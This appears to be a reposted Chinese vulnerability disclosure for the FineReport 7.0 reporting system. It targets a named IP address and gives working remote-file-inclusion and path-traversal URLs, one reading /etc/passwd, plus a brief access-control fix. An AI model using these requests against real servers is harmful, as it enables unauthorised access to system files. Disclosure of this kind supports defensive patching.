来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 系统:华为数据决策系统地址:http://221.194.146.18:8081/WebReport7/ReportServer?op=fs_loadcmd=fs_signin_=1347302374226貌似是一个通用软件finereport报表系统官网:http://www.finereport.com/测试的......
|
系统:华为数据决策系统
地址:http://221.194.146.18:8081/WebReport7/ReportServer?op=fs_load&cmd=fs_signin&_=1347302374226
貌似是一个通用软件——finereport报表系统
官网:http://www.finereport.com/
测试的版本是Linux版7.0的,系统存在远程文件包含漏洞
http://221.194.146.18:8081/WebReport7/ReportServer?op=resource&resource=http://www.baidu.com/
 也存在本地文件包含
http://221.194.146.18:8081/WebReport7/ReportServer?op=resource&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
 修复方案:
改不了源码的话,直接做访问控制吧
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
